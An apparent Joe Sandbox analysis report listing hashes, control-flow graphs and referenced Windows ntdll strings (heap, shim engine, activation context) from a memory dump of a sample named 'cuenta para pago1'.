                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7fd0b1624ac32b3b8c921b4508b88590d4f69b5afdfba495885d78dacc21372b
                                                                                      • Instruction ID: 63a364cff74006a6414852c7daaaffa4693999276b34053edcb735f45ac8c44c
                                                                                      • Opcode Fuzzy Hash: 7fd0b1624ac32b3b8c921b4508b88590d4f69b5afdfba495885d78dacc21372b
                                                                                      • Instruction Fuzzy Hash: A990022124110C02D540B1588514707101687D0645F51C496A0115514DC62EC96A76B1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34902F00 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b3368982f7461e396429025293ce7771c2dd154a1d7e1a90270212ae08bcd19
                                                                                      • Instruction ID: 206b3aecad9311e04a3d90f60848cf4633b33bd46a4340e90771c6f1655eef91
                                                                                      • Opcode Fuzzy Hash: 5b3368982f7461e396429025293ce7771c2dd154a1d7e1a90270212ae08bcd19
                                                                                      • Instruction Fuzzy Hash: 4190022121190442D600A5684D14B07101547D0347F51C59AA0245514CC92DC8667521
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34902F30 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 02eb1adb90272add0b02eacd6b78fcf272cc25b19d5ea256d17dbaeac6e52ae5
                                                                                      • Instruction ID: 267e818f1d065a33cc9b08fa5306f956c94f1ff2f0ce37f3253138924ff9236e
                                                                                      • Opcode Fuzzy Hash: 02eb1adb90272add0b02eacd6b78fcf272cc25b19d5ea256d17dbaeac6e52ae5
                                                                                      • Instruction Fuzzy Hash: 1C90022120154842D540A2584904B0F511547E1246F91C49EA4247514CC92DC85A7721
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 34904260 Relevance: .0, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 32e62ec50cf0adf819a0c541a346a3363e654ad14f3d07cbb29c256984281289
                                                                                      • Instruction ID: 646daaec1ab65ee0207c748066a42b9eb81e9b51cf4db5833e7e1bdc1d834e75
                                                                                      • Opcode Fuzzy Hash: 32e62ec50cf0adf819a0c541a346a3363e654ad14f3d07cbb29c256984281289
                                                                                      • Instruction Fuzzy Hash: A3900231605504129540B1584984546501557E0345B51C496E0515514CCA2CC95B7361
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3499A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 366 3499a1f0-3499a269 call 348d2330 * 2 RtlDebugPrintTimes 372 3499a41f-3499a444 call 348d24d0 * 2 call 34904b50 366->372 373 3499a26f-3499a27a 366->373 375 3499a27c-3499a289 373->375 376 3499a2a4 373->376 378 3499a28b-3499a28d 375->378 379 3499a28f-3499a295 375->379 380 3499a2a8-3499a2b4 376->380 378->379 382 3499a29b-3499a2a2 379->382 383 3499a373-3499a375 379->383 384 3499a2c1-3499a2c3 380->384 382->380 386 3499a39f-3499a3a1 383->386 387 3499a2c5-3499a2c7 384->387 388 3499a2b6-3499a2bc 384->388 389 3499a2d5-3499a2fd RtlDebugPrintTimes 386->389 390 3499a3a7-3499a3b4 386->390 387->386 392 3499a2cc-3499a2d0 388->392 393 3499a2be 388->393 389->372 402 3499a303-3499a320 RtlDebugPrintTimes 389->402 395 3499a3da-3499a3e6 390->395 396 3499a3b6-3499a3c3 390->396 394 3499a3ec-3499a3ee 392->394 393->384 394->386 401 3499a3fb-3499a3fd 395->401 399 3499a3cb-3499a3d1 396->399 400 3499a3c5-3499a3c9 396->400 403 3499a4eb-3499a4ed 399->403 404 3499a3d7 399->404 400->399 405 3499a3ff-3499a401 401->405 406 3499a3f0-3499a3f6 401->406 402->372 414 3499a326-3499a34c RtlDebugPrintTimes 402->414 407 3499a403-3499a409 403->407 404->395 405->407 408 3499a3f8 406->408 409 3499a447-3499a44b 406->409 410 3499a40b-3499a41d RtlDebugPrintTimes 407->410 411 3499a450-3499a474 RtlDebugPrintTimes 407->411 408->401 413 3499a51f-3499a521 409->413 410->372 411->372 418 3499a476-3499a493 RtlDebugPrintTimes 411->418 414->372 419 3499a352-3499a354 414->419 418->372 423 3499a495-3499a4c4 RtlDebugPrintTimes 418->423 421 3499a377-3499a38a 419->421 422 3499a356-3499a363 419->422 426 3499a397-3499a399 421->426 424 3499a36b-3499a371 422->424 425 3499a365-3499a369 422->425 423->372 432 3499a4ca-3499a4cc 423->432 424->383 424->421 425->424 427 3499a39b-3499a39d 426->427 428 3499a38c-3499a392 426->428 427->386 429 3499a3e8-3499a3ea 428->429 430 3499a394 428->430 429->394 430->426 433 3499a4ce-3499a4db 432->433 434 3499a4f2-3499a505 432->434 435 3499a4dd-3499a4e1 433->435 436 3499a4e3-3499a4e9 433->436 437 3499a512-3499a514 434->437 435->436 436->403 436->434 438 3499a507-3499a50d 437->438 439 3499a516 437->439 440 3499a51b-3499a51d 438->440 441 3499a50f 438->441 439->405 440->413 441->437
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: HEAP:
                                                                                      • API String ID: 3446177414-2466845122
                                                                                      • Opcode ID: 54d855047e76dd8addf80a13063d253e54c0adbc08fe5b01bfdabe9b5a3f08bd
                                                                                      • Instruction ID: 1ea2bb0e1969761e347b0c55386b7724efba3f1bc65f85fb9297f12210982642
                                                                                      • Opcode Fuzzy Hash: 54d855047e76dd8addf80a13063d253e54c0adbc08fe5b01bfdabe9b5a3f08bd
                                                                                      • Instruction Fuzzy Hash: 85A1BB757183528FE714CE28C894A5ABBEAFF88350F14456DE945DB320EB70EC45CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 442 348f7550-348f7571 443 348f75ab-348f75b9 call 34904b50 442->443 444 348f7573-348f758f call 348ce580 442->444 449 34934443 444->449 450 348f7595-348f75a2 444->450 454 3493444a-34934450 449->454 451 348f75ba-348f75c9 call 348f7738 450->451 452 348f75a4 450->452 458 348f75cb-348f75e1 call 348f76ed 451->458 459 348f7621-348f762a 451->459 452->443 456 34934456-349344c3 call 3494ef10 call 34908f40 RtlDebugPrintTimes BaseQueryModuleData 454->456 457 348f75e7-348f75f0 call 348f7648 454->457 456->457 474 349344c9-349344d1 456->474 457->459 467 348f75f2 457->467 458->454 458->457 462 348f75f8-348f7601 459->462 469 348f762c-348f762e 462->469 470 348f7603-348f7612 call 348f763b 462->470 467->462 471 348f7614-348f7616 469->471 470->471 476 348f7618-348f761a 471->476 477 348f7630-348f7639 471->477 474->457 479 349344d7-349344de 474->479 476->452 478 348f761c 476->478 477->476 480 349345c9-349345db call 34902b70 478->480 479->457 481 349344e4-349344ef 479->481 480->452 483 349344f5-3493452e call 3494ef10 call 3490a9c0 481->483 484 349345c4 call 34904c68 481->484 491 34934530-34934541 call 3494ef10 483->491 492 34934546-34934576 call 3494ef10 483->492 484->480 491->459 492->457 497 3493457c-3493458a call 3490a690 492->497 500 34934591-349345ae call 3494ef10 call 3493cc1e 497->500 501 3493458c-3493458e 497->501 500->457 506 349345b4-349345bd 500->506 501->500 506->497 507 349345bf 506->507 507->457
                                                                                      Strings
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 34934592
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3493454D
                                                                                      • ExecuteOptions, xrefs: 349344AB
                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 34934460
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 34934507
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 34934530
                                                                                      • Execute=1, xrefs: 3493451E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      • Opcode ID: 2899e880deb0b984a03890428cd0df1949672dc30139f651c2a1da7af0788bd4
                                                                                      • Instruction ID: 4a904d8946d9ffbe5d29eb17a3bf3dc0d942eebab8030b12e1b5cbb7136f748c
                                                                                      • Opcode Fuzzy Hash: 2899e880deb0b984a03890428cd0df1949672dc30139f651c2a1da7af0788bd4
                                                                                      • Instruction Fuzzy Hash: 6651D675A00219EEFF109FA4EC95FA977ACEF08344F4006E9E505A7281EB71AE45CF60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348DA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 691 348da170-348da18f 692 348da4ad-348da4b4 691->692 693 348da195-348da1b1 691->693 692->693 696 348da4ba-349277c8 692->696 694 349277f3-349277f8 693->694 695 348da1b7-348da1c0 693->695 695->694 697 348da1c6-348da1cc 695->697 696->693 701 349277ce-349277d3 696->701 699 348da5da-348da5dc 697->699 700 348da1d2-348da1d4 697->700 702 348da1da-348da1dd 699->702 703 348da5e2 699->703 700->694 700->702 704 348da393-348da399 701->704 702->694 705 348da1e3-348da1e6 702->705 703->705 706 348da1e8-348da1f1 705->706 707 348da1fa-348da1fd 705->707 708 349277d8-349277e2 706->708 709 348da1f7 706->709 710 348da5e7-348da5f0 707->710 711 348da203-348da24b 707->711 713 349277e7-349277f0 call 3494ef10 708->713 709->707 710->711 712 348da5f6-3492780c 710->712 714 348da250-348da255 711->714 712->713 713->694 717 348da39c-348da39f 714->717 718 348da25b-348da263 714->718 720 348da26f-348da27d 717->720 722 348da3a5-348da3a8 717->722 718->720 721 348da265-348da269 718->721 724 348da3ae-348da3be 720->724 725 348da283-348da288 720->725 721->720 723 348da4bf-348da4c8 721->723 722->724 726 34927823-34927826 722->726 727 348da4ca-348da4cc 723->727 728 348da4e0-348da4e3 723->728 724->726 731 348da3c4-348da3cd 724->731 729 348da28c-348da28e 725->729 726->729 730 3492782c-34927831 726->730 727->720 732 348da4d2-348da4db 727->732 733 348da4e9-348da4ec 728->733 734 3492780e 728->734 735 34927833 729->735 736 348da294-348da2ac call 348da600 729->736 737 34927838 730->737 731->729 732->729 738 34927819 733->738 739 348da4f2-348da4f5 733->739 734->738 735->737 744 348da3d2-348da3d9 736->744 745 348da2b2-348da2da 736->745 741 3492783a-3492783c 737->741 738->726 739->727 741->704 743 34927842 741->743 746 348da2dc-348da2de 744->746 747 348da3df-348da3e2 744->747 745->746 746->741 748 348da2e4-348da2eb 746->748 747->746 749 348da3e8-348da3f3 747->749 750 348da2f1-348da2f4 748->750 751 349278ed 748->751 749->714 753 348da300-348da30a 750->753 752 349278f1-34927909 call 3494ef10 751->752 752->704 753->752 755 348da310-348da32c call 348da760 753->755 759 348da4f7-348da500 755->759 760 348da332-348da337 755->760 762 348da521-348da523 759->762 763 348da502-348da50b 759->763 760->704 761 348da339-348da35d 760->761 764 348da360-348da363 761->764 766 348da549-348da551 762->766 767 348da525-348da543 call 348c4428 762->767 763->762 765 348da50d-348da511 763->765 768 348da369-348da36c 764->768 769 348da3f8-348da3fc 764->769 770 348da517-348da51b 765->770 771 348da5a1-348da5cb RtlDebugPrintTimes 765->771 767->704 767->766 775 349278e3 768->775 776 348da372-348da374 768->776 773 34927847-3492784f 769->773 774 348da402-348da405 769->774 770->762 770->771 771->762 788 348da5d1-348da5d5 771->788 779 348da554-348da56a 773->779 783 34927855-34927859 773->783 778 348da40b-348da40e 774->778 774->779 775->751 780 348da37a-348da381 776->780 781 348da440-348da459 call 348da600 776->781 778->768 784 348da414-348da42c 778->784 779->784 789 348da570-348da579 779->789 785 348da49b-348da4a2 780->785 786 348da387-348da38c 780->786 800 348da45f-348da487 781->800 801 348da57e-348da585 781->801 783->779 790 3492785f-34927868 783->790 784->768 793 348da432-348da43b 784->793 785->753 796 348da4a8 785->796 786->704 794 348da38e 786->794 788->762 789->776 791 34927892-34927894 790->791 792 3492786a-3492786d 790->792 791->779 799 3492789a-349278a3 791->799 797 3492787b-3492787e 792->797 798 3492786f-34927879 792->798 793->776 794->704 796->751 805 34927880-34927889 797->805 806 3492788b 797->806 804 3492788e 798->804 799->776 802 348da489-348da48b 800->802 801->802 803 348da58b-348da58e 801->803 802->786 808 348da491-348da493 802->808 803->802 807 348da594-348da59c 803->807 804->791 805->799 806->804 807->764 809 348da499 808->809 810 349278a8-349278b1 808->810 809->785 810->809 811 349278b7-349278bd 810->811 811->809 812 349278c3-349278cb 811->812 812->809 813 349278d1-349278dc 812->813 813->812 814 349278de 813->814 814->809
                                                                                      Strings
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34927807
                                                                                      • SsHd, xrefs: 348DA304
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 349277E2
                                                                                      • Actx , xrefs: 34927819, 34927880
                                                                                      • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 349278F3
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 349277DD, 34927802
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                      • API String ID: 0-1988757188
                                                                                      • Opcode ID: b4eba345bebf16f60d4c90a03a8a3ccd4d6eadadc5cc6a544af1af491a5ba78f
                                                                                      • Instruction ID: 180dbf904b0868a163110eba0592640561f5c8f3e43d8e988544b1ca26ddae59
                                                                                      • Opcode Fuzzy Hash: b4eba345bebf16f60d4c90a03a8a3ccd4d6eadadc5cc6a544af1af491a5ba78f
                                                                                      • Instruction Fuzzy Hash: 21E1E4746053068FE714CE6CC880B9A77FAFB86364F604B6DE865DB290D731D845CB82
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348DD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 815 348dd690-348dd6cb 816 348dd907-348dd90e 815->816 817 348dd6d1-348dd6db 815->817 816->817 818 348dd914-34929139 816->818 819 34929164 817->819 820 348dd6e1-348dd6ea 817->820 818->817 825 3492913f-34929144 818->825 826 3492916e-3492917d 819->826 820->819 822 348dd6f0-348dd6f3 820->822 823 348dd6f9-348dd6fb 822->823 824 348dd8fa-348dd8fc 822->824 823->819 827 348dd701-348dd704 823->827 824->827 829 348dd902 824->829 828 348dd847-348dd858 call 34904b50 825->828 830 34929158-34929161 call 3494ef10 826->830 827->819 831 348dd70a-348dd70d 827->831 829->831 830->819 834 348dd919-348dd922 831->834 835 348dd713-348dd716 831->835 834->835 840 348dd928-34929153 834->840 838 348dd92d-348dd936 835->838 839 348dd71c-348dd768 call 348dd580 835->839 838->839 843 348dd93c 838->843 839->828 845 348dd76e-348dd772 839->845 840->830 843->826 845->828 846 348dd778-348dd77f 845->846 847 348dd785-348dd789 846->847 848 348dd8f1-348dd8f5 846->848 850 348dd790-348dd79a 847->850 849 34929370-34929388 call 3494ef10 848->849 849->828 850->849 851 348dd7a0-348dd7a7 850->851 853 348dd80d-348dd82d 851->853 854 348dd7a9-348dd7ad 851->854 856 348dd830-348dd833 853->856 857 3492917f 854->857 858 348dd7b3-348dd7b8 854->858 859 348dd85b-348dd860 856->859 860 348dd835-348dd838 856->860 862 34929186-34929188 857->862 861 348dd7be-348dd7c5 858->861 858->862 865 349292e0-349292e8 859->865 866 348dd866-348dd869 859->866 863 348dd83e-348dd840 860->863 864 34929366-3492936b 860->864 868 349291f7-349291fa 861->868 869 348dd7cb-348dd803 call 34908170 861->869 862->861 867 3492918e-349291b7 862->867 872 348dd891-348dd8ac call 348da600 863->872 873 348dd842 863->873 864->828 874 348dd941-348dd94f 865->874 875 349292ee-349292f2 865->875 866->874 876 348dd86f-348dd872 866->876 867->853 877 349291bd-349291d7 call 34918050 867->877 871 349291fe-3492920d call 34918050 868->871 886 348dd805-348dd807 869->886 899 34929224 871->899 900 3492920f-3492921d 871->900 896 34929335-3492933a 872->896 897 348dd8b2-348dd8da 872->897 873->828 878 348dd955-348dd95e 874->878 879 348dd874-348dd884 874->879 875->874 883 349292f8-34929301 875->883 876->860 876->879 877->886 894 349291dd-349291f0 877->894 878->863 879->860 889 348dd886-348dd88f 879->889 890 34929303-34929306 883->890 891 3492931f-34929321 883->891 886->853 895 3492922d-34929231 886->895 889->863 892 34929310-34929313 890->892 893 34929308-3492930e 890->893 891->874 898 34929327-34929330 891->898 901 34929315-3492931a 892->901 902 3492931c 892->902 893->891 894->877 903 349291f2 894->903 895->853 907 34929237-3492923d 895->907 904 348dd8dc-348dd8de 896->904 905 34929340-34929343 896->905 897->904 898->863 899->895 900->871 906 3492921f 900->906 901->898 902->891 903->853 908 34929356-3492935b 904->908 909 348dd8e4-348dd8eb 904->909 905->904 910 34929349-34929351 905->910 906->853 911 34929264-3492926d 907->911 912 3492923f-3492925c 907->912 908->828 915 34929361 908->915 909->848 909->850 910->856 913 349292b4-349292b6 911->913 914 3492926f-34929274 911->914 912->911 916 3492925e-34929261 912->916 918 349292b8-349292d3 call 348c4428 913->918 919 349292d9-349292db 913->919 914->913 917 34929276-3492927a 914->917 915->864 916->911 920 34929282-349292ae RtlDebugPrintTimes 917->920 921 3492927c-34929280 917->921 918->828 918->919 919->828 920->913 925 349292b0 920->925 921->913 921->920 925->913
                                                                                      APIs
                                                                                      Strings
                                                                                      • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34929178
                                                                                      • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 34929372
                                                                                      • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 34929153
                                                                                      • Actx , xrefs: 34929315
                                                                                      • GsHd, xrefs: 348DD794
                                                                                      • RtlpFindActivationContextSection_CheckParameters, xrefs: 3492914E, 34929173
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                      • API String ID: 3446177414-2196497285
                                                                                      • Opcode ID: 1d74a696cf81278f70d39a881153ef41cec8798758604c6cfa59acb41fd349c2
                                                                                      • Instruction ID: 8a877454e213b30df60329343ce344143dfcda74458fac63eea8725f0b9fccec
                                                                                      • Opcode Fuzzy Hash: 1d74a696cf81278f70d39a881153ef41cec8798758604c6cfa59acb41fd349c2
                                                                                      • Instruction Fuzzy Hash: 4DE1CD74B09306DFE711CF24C880B5AB7E9BF89358F404A6DE8959B296D731E844CF92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348C9046 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 199timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: $$@$@wEw
                                                                                      • API String ID: 3446177414-2435863765
                                                                                      • Opcode ID: 080988a0f2566e60dd51711a6669239f3e0b057583097523771deaae47c68c8a
                                                                                      • Instruction ID: a0569d7b8ee88726fbb95b517595a25ce426d20a9fde4795dbd56967e72297a5
                                                                                      • Opcode Fuzzy Hash: 080988a0f2566e60dd51711a6669239f3e0b057583097523771deaae47c68c8a
                                                                                      • Instruction Fuzzy Hash: AB8118B1D0126DDFEB21CB54CC45BDEB6B8AB08750F0042EAE919B7250D7709E85CFA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348B6565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 34919854, 34919895
                                                                                      • LdrpLoadShimEngine, xrefs: 3491984A, 3491988B
                                                                                      • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34919885
                                                                                      • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 34919843
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                      • API String ID: 3446177414-3589223738
                                                                                      • Opcode ID: 19a86d989bed22d929968dfb84b4e95b9779e937f4ea0412c121ca4f2134c690
                                                                                      • Instruction ID: 002c500ca3ff45cbd814169c420b231ba56df3260b79e0ee1a55f40d22ddbf04
                                                                                      • Opcode Fuzzy Hash: 19a86d989bed22d929968dfb84b4e95b9779e937f4ea0412c121ca4f2134c690
                                                                                      • Instruction Fuzzy Hash: 95510276A00358DFEF14DFACC854A9D7BAAEB45314F440269E491BB3A5CBB09C41CF85
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 3496ECD7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • HEAP: , xrefs: 3496ECDD
                                                                                      • ---------------------------------------, xrefs: 3496EDF9
                                                                                      • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 3496EDE3
                                                                                      • Entry Heap Size , xrefs: 3496EDED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.4215456125.0000000034890000.00000040.00001000.00020000.00000000.sdmp, Offset: 34890000, based on PE: true
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.4215456125.00000000349BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_34890000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: DebugPrintTimes
                                                                                      • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                      • API String ID: 3446177414-1102453626
                                                                                      • Opcode ID: e6ed24361da157956e32e85608e5dfbb30af6d900bbf32596492e93af25705cb
                                                                                      • Instruction ID: b4b251d7b36835458a1ae53b5843dcefc87fc93c73682ebba104f6eaf6d0447b
                                                                                      • Opcode Fuzzy Hash: e6ed24361da157956e32e85608e5dfbb30af6d900bbf32596492e93af25705cb
                                                                                      • Instruction Fuzzy Hash: D9419F39A00215DFEF05CF18C49495ABBEAFF8936872581A9D84AAB311D735EC42DF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 348F4C3D Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 3493344A, 34933476
                                                                                      • LdrpFindDllActivationContext, xrefs: 34933440, 3493346C
                                                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 34933466
